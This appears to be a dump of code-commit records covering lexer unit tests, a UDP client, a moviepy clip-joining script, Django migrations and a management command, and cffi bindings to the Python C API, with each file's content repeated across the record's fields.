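from django.core.management import call_command

# Dry run: verifies a single Area holds the old code, deletes nothing.
call_command('mapit_UK_fix_2013-10-south-tynedale')
# Real run: removes the stale GSS code ahead of the 2014-05 import.
call_command('mapit_UK_fix_2013-10-south-tynedale', commit=True)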
40438912639ea20614b7957443450463f6519c0b
|
clusto_query/test/test_lexer.py
|
clusto_query/test/test_lexer.py
|
import unittest
import clusto_query.lexer
class LexerTest(unittest.TestCase):
def test_consume(self):
self.assertEqual(clusto_query.lexer.consume('nom', 'nomnomnom'),
'nomnom')
def test_lex_string_inner_quoted_basic(self):
self.assertEqual(clusto_query.lexer.lex_string_inner("'production' and"),
('production', False, ' and'))
self.assertEqual(clusto_query.lexer.lex_string_inner('"production" and'),
('production', False, ' and'))
def test_lex_string_inner_quoted_with_spaces(self):
self.assertEqual(clusto_query.lexer.lex_string_inner("' prod uction ' and"),
(' prod uction ', False, ' and'))
self.assertEqual(clusto_query.lexer.lex_string_inner('" prod uction " and'),
(' prod uction ', False, ' and'))
def test_lex_string_inner_unquoted(self):
self.assertEqual(clusto_query.lexer.lex_string_inner('1 and'),
('1', True, ' and'))
|
Add some tests for lexer.py
|
Add some tests for lexer.py
|
Python
|
isc
|
uber/clusto-query,uber/clusto-query
|
Add some tests for lexer.py
|
import unittest
import clusto_query.lexer
class LexerTest(unittest.TestCase):
def test_consume(self):
self.assertEqual(clusto_query.lexer.consume('nom', 'nomnomnom'),
'nomnom')
def test_lex_string_inner_quoted_basic(self):
self.assertEqual(clusto_query.lexer.lex_string_inner("'production' and"),
('production', False, ' and'))
self.assertEqual(clusto_query.lexer.lex_string_inner('"production" and'),
('production', False, ' and'))
def test_lex_string_inner_quoted_with_spaces(self):
self.assertEqual(clusto_query.lexer.lex_string_inner("' prod uction ' and"),
(' prod uction ', False, ' and'))
self.assertEqual(clusto_query.lexer.lex_string_inner('" prod uction " and'),
(' prod uction ', False, ' and'))
def test_lex_string_inner_unquoted(self):
self.assertEqual(clusto_query.lexer.lex_string_inner('1 and'),
('1', True, ' and'))
|
<commit_before><commit_msg>Add some tests for lexer.py<commit_after>
|
import unittest
import clusto_query.lexer
class LexerTest(unittest.TestCase):
def test_consume(self):
self.assertEqual(clusto_query.lexer.consume('nom', 'nomnomnom'),
'nomnom')
def test_lex_string_inner_quoted_basic(self):
self.assertEqual(clusto_query.lexer.lex_string_inner("'production' and"),
('production', False, ' and'))
self.assertEqual(clusto_query.lexer.lex_string_inner('"production" and'),
('production', False, ' and'))
def test_lex_string_inner_quoted_with_spaces(self):
self.assertEqual(clusto_query.lexer.lex_string_inner("' prod uction ' and"),
(' prod uction ', False, ' and'))
self.assertEqual(clusto_query.lexer.lex_string_inner('" prod uction " and'),
(' prod uction ', False, ' and'))
def test_lex_string_inner_unquoted(self):
self.assertEqual(clusto_query.lexer.lex_string_inner('1 and'),
('1', True, ' and'))
|
Add some tests for lexer.pyimport unittest
import clusto_query.lexer
class LexerTest(unittest.TestCase):
def test_consume(self):
self.assertEqual(clusto_query.lexer.consume('nom', 'nomnomnom'),
'nomnom')
def test_lex_string_inner_quoted_basic(self):
self.assertEqual(clusto_query.lexer.lex_string_inner("'production' and"),
('production', False, ' and'))
self.assertEqual(clusto_query.lexer.lex_string_inner('"production" and'),
('production', False, ' and'))
def test_lex_string_inner_quoted_with_spaces(self):
self.assertEqual(clusto_query.lexer.lex_string_inner("' prod uction ' and"),
(' prod uction ', False, ' and'))
self.assertEqual(clusto_query.lexer.lex_string_inner('" prod uction " and'),
(' prod uction ', False, ' and'))
def test_lex_string_inner_unquoted(self):
self.assertEqual(clusto_query.lexer.lex_string_inner('1 and'),
('1', True, ' and'))
|
<commit_before><commit_msg>Add some tests for lexer.py<commit_after>import unittest
import clusto_query.lexer
class LexerTest(unittest.TestCase):
def test_consume(self):
self.assertEqual(clusto_query.lexer.consume('nom', 'nomnomnom'),
'nomnom')
def test_lex_string_inner_quoted_basic(self):
self.assertEqual(clusto_query.lexer.lex_string_inner("'production' and"),
('production', False, ' and'))
self.assertEqual(clusto_query.lexer.lex_string_inner('"production" and'),
('production', False, ' and'))
def test_lex_string_inner_quoted_with_spaces(self):
self.assertEqual(clusto_query.lexer.lex_string_inner("' prod uction ' and"),
(' prod uction ', False, ' and'))
self.assertEqual(clusto_query.lexer.lex_string_inner('" prod uction " and'),
(' prod uction ', False, ' and'))
def test_lex_string_inner_unquoted(self):
self.assertEqual(clusto_query.lexer.lex_string_inner('1 and'),
('1', True, ' and'))
|
|
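The tests above pin down the contract of lex_string_inner: a (token, was_unquoted, remainder) triple, with quotes stripped and inner spaces preserved for quoted tokens. A minimal stand-in that satisfies all three tests (not the real clusto_query implementation):

def consume(token, string):
    # Strip a known leading token and return the remainder.
    return string[len(token):]

def lex_string_inner(s):
    if s[0] in ('"', "'"):
        closing = s.index(s[0], 1)            # matching close quote
        return s[1:closing], False, s[closing + 1:]
    word = s.split(None, 1)[0]                # unquoted: read up to whitespace
    return word, True, s[len(word):]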
4d5c9066b9fba17cd484ecfafc646989e4828a87
|
connectionless_client_2.py
|
connectionless_client_2.py
|
"""
A simple connectionless client. It is for studying purposes only.
"""
import socket
__author__ = "Facundo Victor"
__license__ = "MIT"
__email__ = "facundovt@gmail.com"
def do_some_messaging(host, port):
"""
    Handle a simple UDP client. Read data from stdin and send it to the UDP
server.
:param host: Name or IP address of the destination server.
:ptype: String or Integer (see help(socket))
:param port: The transport layer identifier of an application
:ptype: Integer
"""
server = (host, port)
while True:
data = raw_input('Please enter data to send:\n')
if data.strip() == 'exit':
return
print('Sending a data to the server')
sock.sendto(data, server)
(new_data, server_address) = sock.recvfrom(1024)
print('Received data: %s' % (new_data))
"""
Keep in mind that connect() only stores the host and the port; it does not
establish any connection.
"""
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
do_some_messaging("localhost", 8888)
sock.close()
|
Add a basic UDP client
|
Add a basic UDP client
|
Python
|
mit
|
facundovictor/non-blocking-socket-samples
|
Add a basic UDP client
|
"""
A simple connectionless client. It is for studying purposes only.
"""
import socket
__author__ = "Facundo Victor"
__license__ = "MIT"
__email__ = "facundovt@gmail.com"
def do_some_messaging(host, port):
"""
    Handle a simple UDP client. Read data from stdin and send it to the UDP
server.
:param host: Name or IP address of the destination server.
:ptype: String or Integer (see help(socket))
:param port: The transport layer identifier of an application
:ptype: Integer
"""
server = (host, port)
while True:
data = raw_input('Please enter data to send:\n')
if data.strip() == 'exit':
return
print('Sending a data to the server')
sock.sendto(data, server)
(new_data, server_address) = sock.recvfrom(1024)
print('Received data: %s' % (new_data))
"""
Keep in mind that connect() only stores the host and the port; it does not
establish any connection.
"""
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
do_some_messaging("localhost", 8888)
sock.close()
|
<commit_before><commit_msg>Add a basic UDP client<commit_after>
|
"""
A simple connectionless client. It is for studying purposes only.
"""
import socket
__author__ = "Facundo Victor"
__license__ = "MIT"
__email__ = "facundovt@gmail.com"
def do_some_messaging(host, port):
"""
    Handle a simple UDP client. Read data from stdin and send it to the UDP
server.
:param host: Name or IP address of the destination server.
:ptype: String or Integer (see help(socket))
:param port: The transport layer identifier of an application
:ptype: Integer
"""
server = (host, port)
while True:
data = raw_input('Please enter data to send:\n')
if data.strip() == 'exit':
return
print('Sending a data to the server')
sock.sendto(data, server)
(new_data, server_address) = sock.recvfrom(1024)
print('Received data: %s' % (new_data))
"""
Keep in mind that connect() only stores the host and the port; it does not
establish any connection.
"""
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
do_some_messaging("localhost", 8888)
sock.close()
|
Add a basic UDP client"""
A simple connectionless client. It is for studying purposes only.
"""
import socket
__author__ = "Facundo Victor"
__license__ = "MIT"
__email__ = "facundovt@gmail.com"
def do_some_messaging(host, port):
"""
    Handle a simple UDP client. Read data from stdin and send it to the UDP
server.
:param host: Name or IP address of the destination server.
:ptype: String or Integer (see help(socket))
:param port: The transport layer identifier of an application
:ptype: Integer
"""
server = (host, port)
while True:
data = raw_input('Please enter data to send:\n')
if data.strip() == 'exit':
return
print('Sending a data to the server')
sock.sendto(data, server)
(new_data, server_address) = sock.recvfrom(1024)
print('Received data: %s' % (new_data))
"""
Keep in mind that connect() only stores the host and the port; it does not
establish any connection.
"""
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
do_some_messaging("localhost", 8888)
sock.close()
|
<commit_before><commit_msg>Add a basic UDP client<commit_after>"""
A simple connectionless client. It is for studying purposes only.
"""
import socket
__author__ = "Facundo Victor"
__license__ = "MIT"
__email__ = "facundovt@gmail.com"
def do_some_messaging(host, port):
"""
    Handle a simple UDP client. Read data from stdin and send it to the UDP
server.
:param host: Name or IP address of the destination server.
:ptype: String or Integer (see help(socket))
:param port: The transport layer identifier of an application
:ptype: Integer
"""
server = (host, port)
while True:
data = raw_input('Please enter data to send:\n')
if data.strip() == 'exit':
return
print('Sending a data to the server')
sock.sendto(data, server)
(new_data, server_address) = sock.recvfrom(1024)
print('Received data: %s' % (new_data))
"""
Keep in mind that connect() only stores the host and the port; it does not
establish any connection.
"""
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
do_some_messaging("localhost", 8888)
sock.close()
|
|
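The client above assumes something is listening on localhost:8888; a minimal UDP echo server to pair with it (not part of the commit):

import socket

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(('localhost', 8888))
while True:
    # Echo each datagram back to whichever client sent it.
    data, address = sock.recvfrom(1024)
    sock.sendto(data, address)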
5da2c5406daf31cb4f0c310abd56c1173609c549
|
join_clips.py
|
join_clips.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from moviepy.editor import VideoFileClip, clips_array
import argparse
def main(args):
print(args)
clips = map(VideoFileClip, args.file)
final_clip = clips_array([clips])
final_clip.write_videofile(args.output, fps=15)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-o', '--output', required=True)
parser.add_argument('file', nargs='+')
main(parser.parse_args())
|
Add script to create single movie file from others horizontally
|
Add script to create single movie file from others horizontally
|
Python
|
mit
|
NGTS/frame-movies,NGTS/frame-movies
|
Add script to create single movie file from others horizontally
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from moviepy.editor import VideoFileClip, clips_array
import argparse
def main(args):
print(args)
clips = map(VideoFileClip, args.file)
final_clip = clips_array([clips])
final_clip.write_videofile(args.output, fps=15)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-o', '--output', required=True)
parser.add_argument('file', nargs='+')
main(parser.parse_args())
|
<commit_before><commit_msg>Add script to create single movie file from others horizontally<commit_after>
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from moviepy.editor import VideoFileClip, clips_array
import argparse
def main(args):
print(args)
clips = map(VideoFileClip, args.file)
final_clip = clips_array([clips])
final_clip.write_videofile(args.output, fps=15)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-o', '--output', required=True)
parser.add_argument('file', nargs='+')
main(parser.parse_args())
|
Add script to create single movie file from others horizontally#!/usr/bin/env python
# -*- coding: utf-8 -*-
from moviepy.editor import VideoFileClip, clips_array
import argparse
def main(args):
print(args)
clips = map(VideoFileClip, args.file)
final_clip = clips_array([clips])
final_clip.write_videofile(args.output, fps=15)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-o', '--output', required=True)
parser.add_argument('file', nargs='+')
main(parser.parse_args())
|
<commit_before><commit_msg>Add script to create single movie file from others horizontally<commit_after>#!/usr/bin/env python
# -*- coding: utf-8 -*-
from moviepy.editor import VideoFileClip, clips_array
import argparse
def main(args):
print(args)
clips = map(VideoFileClip, args.file)
final_clip = clips_array([clips])
final_clip.write_videofile(args.output, fps=15)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-o', '--output', required=True)
parser.add_argument('file', nargs='+')
main(parser.parse_args())
|
|
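clips_array([clips]) above lays the inputs out side by side in a single row. The script reads as Python 2 code (a raw map() result is passed straight in); a Python 3-safe sketch of the same core with placeholder file names:

from moviepy.editor import VideoFileClip, clips_array

# Equivalent to: python join_clips.py -o combined.mp4 left.mp4 right.mp4
files = ['left.mp4', 'right.mp4']
clips = [VideoFileClip(f) for f in files]  # a list, since map() is lazy on Py3
final_clip = clips_array([clips])          # one row, clips side by side
final_clip.write_videofile('combined.mp4', fps=15)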
5cb6057240fd296dbce36829366611b30cdaab29
|
gem/migrations/0027_set_site_settings_correctly.py
|
gem/migrations/0027_set_site_settings_correctly.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations
from molo.profiles.models import UserProfilesSettings
from wagtail.wagtailcore.models import Site
def set_site_settings(apps, schema_editor):
for site in Site.objects.all():
settings = UserProfilesSettings.for_site(site)
settings.show_security_question_fields = True
settings.security_questions_required = True
settings.num_security_questions = 2
settings.activate_display_name = True
settings.capture_display_name_on_reg = True
settings.display_name_required = True
settings.activate_gender = True
settings.capture_gender_on_reg = True
settings.gender_required = True
settings.save()
def unset_site_settings(apps, schema_editor):
# We don't know what we should be unsetting the
# site settings to here. It might be safest to
# do a no-op.
pass
class Migration(migrations.Migration):
dependencies = [
('gem', '0026_migrate_security_answers_off_gem_profile'),
('profiles', '0013_add_location_gender_education_level_fields'),
]
operations = [
migrations.RunPython(
set_site_settings,
unset_site_settings,
),
]
|
Add migration to set UserProfilesSettings correctly
|
Add migration to set UserProfilesSettings correctly
|
Python
|
bsd-2-clause
|
praekelt/molo-gem,praekelt/molo-gem,praekelt/molo-gem
|
Add migration to set UserProfilesSettings correctly
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations
from molo.profiles.models import UserProfilesSettings
from wagtail.wagtailcore.models import Site
def set_site_settings(apps, schema_editor):
for site in Site.objects.all():
settings = UserProfilesSettings.for_site(site)
settings.show_security_question_fields = True
settings.security_questions_required = True
settings.num_security_questions = 2
settings.activate_display_name = True
settings.capture_display_name_on_reg = True
settings.display_name_required = True
settings.activate_gender = True
settings.capture_gender_on_reg = True
settings.gender_required = True
settings.save()
def unset_site_settings(apps, schema_editor):
# We don't know what we should be unsetting the
# site settings to here. It might be safest to
# do a no-op.
pass
class Migration(migrations.Migration):
dependencies = [
('gem', '0026_migrate_security_answers_off_gem_profile'),
('profiles', '0013_add_location_gender_education_level_fields'),
]
operations = [
migrations.RunPython(
set_site_settings,
unset_site_settings,
),
]
|
<commit_before><commit_msg>Add migration to set UserProfilesSettings correctly<commit_after>
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations
from molo.profiles.models import UserProfilesSettings
from wagtail.wagtailcore.models import Site
def set_site_settings(apps, schema_editor):
for site in Site.objects.all():
settings = UserProfilesSettings.for_site(site)
settings.show_security_question_fields = True
settings.security_questions_required = True
settings.num_security_questions = 2
settings.activate_display_name = True
settings.capture_display_name_on_reg = True
settings.display_name_required = True
settings.activate_gender = True
settings.capture_gender_on_reg = True
settings.gender_required = True
settings.save()
def unset_site_settings(apps, schema_editor):
# We don't know what we should be unsetting the
# site settings to here. It might be safest to
# do a no-op.
pass
class Migration(migrations.Migration):
dependencies = [
('gem', '0026_migrate_security_answers_off_gem_profile'),
('profiles', '0013_add_location_gender_education_level_fields'),
]
operations = [
migrations.RunPython(
set_site_settings,
unset_site_settings,
),
]
|
Add migration to set UserProfilesSettings correctly# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations
from molo.profiles.models import UserProfilesSettings
from wagtail.wagtailcore.models import Site
def set_site_settings(apps, schema_editor):
for site in Site.objects.all():
settings = UserProfilesSettings.for_site(site)
settings.show_security_question_fields = True
settings.security_questions_required = True
settings.num_security_questions = 2
settings.activate_display_name = True
settings.capture_display_name_on_reg = True
settings.display_name_required = True
settings.activate_gender = True
settings.capture_gender_on_reg = True
settings.gender_required = True
settings.save()
def unset_site_settings(apps, schema_editor):
# We don't know what we should be unsetting the
# site settings to here. It might be safest to
# do a no-op.
pass
class Migration(migrations.Migration):
dependencies = [
('gem', '0026_migrate_security_answers_off_gem_profile'),
('profiles', '0013_add_location_gender_education_level_fields'),
]
operations = [
migrations.RunPython(
set_site_settings,
unset_site_settings,
),
]
|
<commit_before><commit_msg>Add migration to set UserProfilesSettings correctly<commit_after># -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations
from molo.profiles.models import UserProfilesSettings
from wagtail.wagtailcore.models import Site
def set_site_settings(apps, schema_editor):
for site in Site.objects.all():
settings = UserProfilesSettings.for_site(site)
settings.show_security_question_fields = True
settings.security_questions_required = True
settings.num_security_questions = 2
settings.activate_display_name = True
settings.capture_display_name_on_reg = True
settings.display_name_required = True
settings.activate_gender = True
settings.capture_gender_on_reg = True
settings.gender_required = True
settings.save()
def unset_site_settings(apps, schema_editor):
# We don't know what we should be unsetting the
# site settings to here. It might be safest to
# do a no-op.
pass
class Migration(migrations.Migration):
dependencies = [
('gem', '0026_migrate_security_answers_off_gem_profile'),
('profiles', '0013_add_location_gender_education_level_fields'),
]
operations = [
migrations.RunPython(
set_site_settings,
unset_site_settings,
),
]
|
|
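Data migrations conventionally fetch historical models through apps.get_model instead of importing them directly; the direct imports above are presumably deliberate, because for_site is a custom classmethod that historical model states do not carry. For reference, a registry-based sketch of the same idea (the app labels and the get_or_create stand-in for for_site are assumptions, not from the commit):

def set_site_settings(apps, schema_editor):
    # Historical models carry fields but not custom methods like for_site,
    # so get_or_create on the site is used as a stand-in here.
    Site = apps.get_model('wagtailcore', 'Site')
    ProfilesSettings = apps.get_model('profiles', 'UserProfilesSettings')
    for site in Site.objects.all():
        settings, _ = ProfilesSettings.objects.get_or_create(site=site)
        settings.show_security_question_fields = True
        settings.security_questions_required = True
        settings.num_security_questions = 2
        settings.save()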
383882ff8078efa3e368cde1bde96279eb0b3b5d
|
apps/gallery/migrations/0003_auto_20151015_0005.py
|
apps/gallery/migrations/0003_auto_20151015_0005.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('gallery', '0002_auto_20150916_1953'),
]
operations = [
migrations.AlterModelOptions(
name='responsiveimage',
options={'verbose_name': 'Responsivt Bilde', 'verbose_name_plural': 'Responsive Bilder', 'permissions': ('view_responsiveimage', 'View ResponsiveImage')},
),
]
|
Add meta class migration for responsiveimage
|
Add meta class migration for responsiveimage
|
Python
|
mit
|
dotKom/onlineweb4,dotKom/onlineweb4,dotKom/onlineweb4,dotKom/onlineweb4
|
Add meta class migration for responsiveimage
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('gallery', '0002_auto_20150916_1953'),
]
operations = [
migrations.AlterModelOptions(
name='responsiveimage',
options={'verbose_name': 'Responsivt Bilde', 'verbose_name_plural': 'Responsive Bilder', 'permissions': ('view_responsiveimage', 'View ResponsiveImage')},
),
]
|
<commit_before><commit_msg>Add meta class migration for responsiveimage<commit_after>
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('gallery', '0002_auto_20150916_1953'),
]
operations = [
migrations.AlterModelOptions(
name='responsiveimage',
options={'verbose_name': 'Responsivt Bilde', 'verbose_name_plural': 'Responsive Bilder', 'permissions': ('view_responsiveimage', 'View ResponsiveImage')},
),
]
|
Add meta class migration for responsiveimage# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('gallery', '0002_auto_20150916_1953'),
]
operations = [
migrations.AlterModelOptions(
name='responsiveimage',
options={'verbose_name': 'Responsivt Bilde', 'verbose_name_plural': 'Responsive Bilder', 'permissions': ('view_responsiveimage', 'View ResponsiveImage')},
),
]
|
<commit_before><commit_msg>Add meta class migration for responsiveimage<commit_after># -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('gallery', '0002_auto_20150916_1953'),
]
operations = [
migrations.AlterModelOptions(
name='responsiveimage',
options={'verbose_name': 'Responsivt Bilde', 'verbose_name_plural': 'Responsive Bilder', 'permissions': ('view_responsiveimage', 'View ResponsiveImage')},
),
]
|
|
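AlterModelOptions operations like the one above carry no schema change; they are emitted whenever a model's Meta options drift from the recorded migration state. The Meta block that would produce this operation looks roughly like the following sketch (the real model lives in the app's models.py; the field shown is a placeholder):

from django.db import models

class ResponsiveImage(models.Model):
    name = models.CharField(max_length=200)  # placeholder field

    class Meta:
        verbose_name = 'Responsivt Bilde'
        verbose_name_plural = 'Responsive Bilder'
        permissions = (('view_responsiveimage', 'View ResponsiveImage'),)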
3edef1b1876014298d53f7ac667af46b841432c5
|
sift/concerts/management/commands/add_artists.py
|
sift/concerts/management/commands/add_artists.py
|
"""
management/commands/add_artists.py
Add artist(s) to database.
"""
from datetime import datetime
import os, sys
from django.core.management import call_command
from django.core.management.base import BaseCommand, CommandError
from concerts.models import Artist
from concerts.utils import FIXTURE_DIRS
class Command(BaseCommand):
help = 'Add artists to the Artist table.'
def add_arguments(self, parser):
parser.add_argument('artists', nargs='+',
help='Artist names to add, wrapped in double quotes if necessary')
def handle(self, **options):
# get manual confirmation that artists were entered correctly
print("Artists to add:")
for artist in options['artists']:
self.stdout.write(artist)
artists_verified = input("Continue? [y/n]: ")
self.stdout.write("\n")
if not artists_verified.lower() == 'y':
sys.exit("\nAborting.\n")
added_new_artists = False
for artist_name in options['artists']:
if Artist.objects.filter(name__iexact=artist_name).count():
self.stdout.write("Existing artist {} found. Skipping..".format(
artist_name)
)
continue
#except models.DoesNotExist: # desirable
artist_obj = Artist.add_artist(artist_name)
self.stdout.write("New Artist entry created: {}".format(artist_obj))
added_new_artists = True
if added_new_artists:
# TODO fixture rotation?
artist_fixture_name = datetime.utcnow().strftime('%Y%m%d') + '_artist.json'
artist_fixture_path = os.path.join(FIXTURE_DIRS['artists'], artist_fixture_name)
self.stdout.write("Dumping new Artist fixture: {}".format(artist_fixture_name))
call_command(
'dumpdata',
'concerts.Artist',
'--indent=4',
'--output={}'.format(artist_fixture_path)
)
self.stdout.write("Done!\n")
else:
self.stdout.write("No new artists added.\n")
|
Add mgmt command to add artists to DB
|
Add mgmt command to add artists to DB
|
Python
|
mit
|
industryjhr/sift_app,industryjhr/sift_app,jravesloot/sift_app,jravesloot/sift_app
|
Add mgmt command to add artists to DB
|
"""
management/commands/add_artists.py
Add artist(s) to database.
"""
from datetime import datetime
import os, sys
from django.core.management import call_command
from django.core.management.base import BaseCommand, CommandError
from concerts.models import Artist
from concerts.utils import FIXTURE_DIRS
class Command(BaseCommand):
help = 'Add artists to the Artist table.'
def add_arguments(self, parser):
parser.add_argument('artists', nargs='+',
help='Artist names to add, wrapped in double quotes if necessary')
def handle(self, **options):
# get manual confirmation that artists were entered correctly
print("Artists to add:")
for artist in options['artists']:
self.stdout.write(artist)
artists_verified = input("Continue? [y/n]: ")
self.stdout.write("\n")
if not artists_verified.lower() == 'y':
sys.exit("\nAborting.\n")
added_new_artists = False
for artist_name in options['artists']:
if Artist.objects.filter(name__iexact=artist_name).count():
self.stdout.write("Existing artist {} found. Skipping..".format(
artist_name)
)
continue
#except models.DoesNotExist: # desirable
artist_obj = Artist.add_artist(artist_name)
self.stdout.write("New Artist entry created: {}".format(artist_obj))
added_new_artists = True
if added_new_artists:
# TODO fixture rotation?
artist_fixture_name = datetime.utcnow().strftime('%Y%m%d') + '_artist.json'
artist_fixture_path = os.path.join(FIXTURE_DIRS['artists'], artist_fixture_name)
self.stdout.write("Dumping new Artist fixture: {}".format(artist_fixture_name))
call_command(
'dumpdata',
'concerts.Artist',
'--indent=4',
'--output={}'.format(artist_fixture_path)
)
self.stdout.write("Done!\n")
else:
self.stdout.write("No new artists added.\n")
|
<commit_before><commit_msg>Add mgmt command to add artists to DB<commit_after>
|
"""
management/commands/add_artists.py
Add artist(s) to database.
"""
from datetime import datetime
import os, sys
from django.core.management import call_command
from django.core.management.base import BaseCommand, CommandError
from concerts.models import Artist
from concerts.utils import FIXTURE_DIRS
class Command(BaseCommand):
help = 'Add artists to the Artist table.'
def add_arguments(self, parser):
parser.add_argument('artists', nargs='+',
help='Artist names to add, wrapped in double quotes if necessary')
def handle(self, **options):
# get manual confirmation that artists were entered correctly
print("Artists to add:")
for artist in options['artists']:
self.stdout.write(artist)
artists_verified = input("Continue? [y/n]: ")
self.stdout.write("\n")
if not artists_verified.lower() == 'y':
sys.exit("\nAborting.\n")
added_new_artists = False
for artist_name in options['artists']:
if Artist.objects.filter(name__iexact=artist_name).count():
self.stdout.write("Existing artist {} found. Skipping..".format(
artist_name)
)
continue
#except models.DoesNotExist: # desirable
artist_obj = Artist.add_artist(artist_name)
self.stdout.write("New Artist entry created: {}".format(artist_obj))
added_new_artists = True
if added_new_artists:
# TODO fixture rotation?
artist_fixture_name = datetime.utcnow().strftime('%Y%m%d') + '_artist.json'
artist_fixture_path = os.path.join(FIXTURE_DIRS['artists'], artist_fixture_name)
self.stdout.write("Dumping new Artist fixture: {}".format(artist_fixture_name))
call_command(
'dumpdata',
'concerts.Artist',
'--indent=4',
'--output={}'.format(artist_fixture_path)
)
self.stdout.write("Done!\n")
else:
self.stdout.write("No new artists added.\n")
|
Add mgmt command to add artists to DB"""
management/commands/add_artists.py
Add artist(s) to database.
"""
from datetime import datetime
import os, sys
from django.core.management import call_command
from django.core.management.base import BaseCommand, CommandError
from concerts.models import Artist
from concerts.utils import FIXTURE_DIRS
class Command(BaseCommand):
help = 'Add artists to the Artist table.'
def add_arguments(self, parser):
parser.add_argument('artists', nargs='+',
help='Artist names to add, wrapped in double quotes if necessary')
def handle(self, **options):
# get manual confirmation that artists were entered correctly
print("Artists to add:")
for artist in options['artists']:
self.stdout.write(artist)
artists_verified = input("Continue? [y/n]: ")
self.stdout.write("\n")
if not artists_verified.lower() == 'y':
sys.exit("\nAborting.\n")
added_new_artists = False
for artist_name in options['artists']:
if Artist.objects.filter(name__iexact=artist_name).count():
self.stdout.write("Existing artist {} found. Skipping..".format(
artist_name)
)
continue
#except models.DoesNotExist: # desirable
artist_obj = Artist.add_artist(artist_name)
self.stdout.write("New Artist entry created: {}".format(artist_obj))
added_new_artists = True
if added_new_artists:
# TODO fixture rotation?
artist_fixture_name = datetime.utcnow().strftime('%Y%m%d') + '_artist.json'
artist_fixture_path = os.path.join(FIXTURE_DIRS['artists'], artist_fixture_name)
self.stdout.write("Dumping new Artist fixture: {}".format(artist_fixture_name))
call_command(
'dumpdata',
'concerts.Artist',
'--indent=4',
'--output={}'.format(artist_fixture_path)
)
self.stdout.write("Done!\n")
else:
self.stdout.write("No new artists added.\n")
|
<commit_before><commit_msg>Add mgmt command to add artists to DB<commit_after>"""
management/commands/add_artists.py
Add artist(s) to database.
"""
from datetime import datetime
import os, sys
from django.core.management import call_command
from django.core.management.base import BaseCommand, CommandError
from concerts.models import Artist
from concerts.utils import FIXTURE_DIRS
class Command(BaseCommand):
help = 'Add artists to the Artist table.'
def add_arguments(self, parser):
parser.add_argument('artists', nargs='+',
help='Artist names to add, wrapped in double quotes if necessary')
def handle(self, **options):
# get manual confirmation that artists were entered correctly
print("Artists to add:")
for artist in options['artists']:
self.stdout.write(artist)
artists_verified = input("Continue? [y/n]: ")
self.stdout.write("\n")
if not artists_verified.lower() == 'y':
sys.exit("\nAborting.\n")
added_new_artists = False
for artist_name in options['artists']:
if Artist.objects.filter(name__iexact=artist_name).count():
self.stdout.write("Existing artist {} found. Skipping..".format(
artist_name)
)
continue
#except models.DoesNotExist: # desirable
artist_obj = Artist.add_artist(artist_name)
self.stdout.write("New Artist entry created: {}".format(artist_obj))
added_new_artists = True
if added_new_artists:
# TODO fixture rotation?
artist_fixture_name = datetime.utcnow().strftime('%Y%m%d') + '_artist.json'
artist_fixture_path = os.path.join(FIXTURE_DIRS['artists'], artist_fixture_name)
self.stdout.write("Dumping new Artist fixture: {}".format(artist_fixture_name))
call_command(
'dumpdata',
'concerts.Artist',
'--indent=4',
'--output={}'.format(artist_fixture_path)
)
self.stdout.write("Done!\n")
else:
self.stdout.write("No new artists added.\n")
|
|
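The command above is interactive (it confirms the artist list via input()), so driving it programmatically means answering or patching that prompt. A hedged usage sketch, from the shell and from test code:

# Shell usage (assumes the file sits in an app's management/commands/):
#   python manage.py add_artists "Artist One" "Artist Two"
#
# Programmatic usage from a test, patching the confirmation prompt:
from unittest import mock
from django.core.management import call_command

with mock.patch('builtins.input', return_value='y'):
    call_command('add_artists', 'Artist One', 'Artist Two')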
bd609e591f8eac5bf50221b41df37da27e026afb
|
pymetabiosis/bindings.py
|
pymetabiosis/bindings.py
|
from cffi import FFI
import sys
ffi = FFI()
ffi.cdef("""
typedef ... PyObject;
void Py_Initialize();
void Py_Finalize();
int PyRun_SimpleString(const char *command);
void Py_INCREF(PyObject *o);
void Py_XINCREF(PyObject *o);
void Py_DECREF(PyObject *o);
void Py_XDECREF(PyObject *o);
PyObject* PyImport_ImportModule(const char *name);
PyObject* PyErr_Occurred();
void PyErr_Print();
PyObject* PyObject_Str(PyObject *o);
PyObject* PyObject_Repr(PyObject *o);
char* PyString_AsString(PyObject *string);
""")
lib = ffi.verify("#include<Python.h>", libraries=["python2.7"], flags=ffi.RTLD_GLOBAL)
lib.Py_Initialize()
|
Add the binding to the C API
|
Add the binding to the C API
|
Python
|
mit
|
prabhuramachandran/pymetabiosis,rguillebert/pymetabiosis
|
Add the binding to the C API
|
from cffi import FFI
import sys
ffi = FFI()
ffi.cdef("""
typedef ... PyObject;
void Py_Initialize();
void Py_Finalize();
int PyRun_SimpleString(const char *command);
void Py_INCREF(PyObject *o);
void Py_XINCREF(PyObject *o);
void Py_DECREF(PyObject *o);
void Py_XDECREF(PyObject *o);
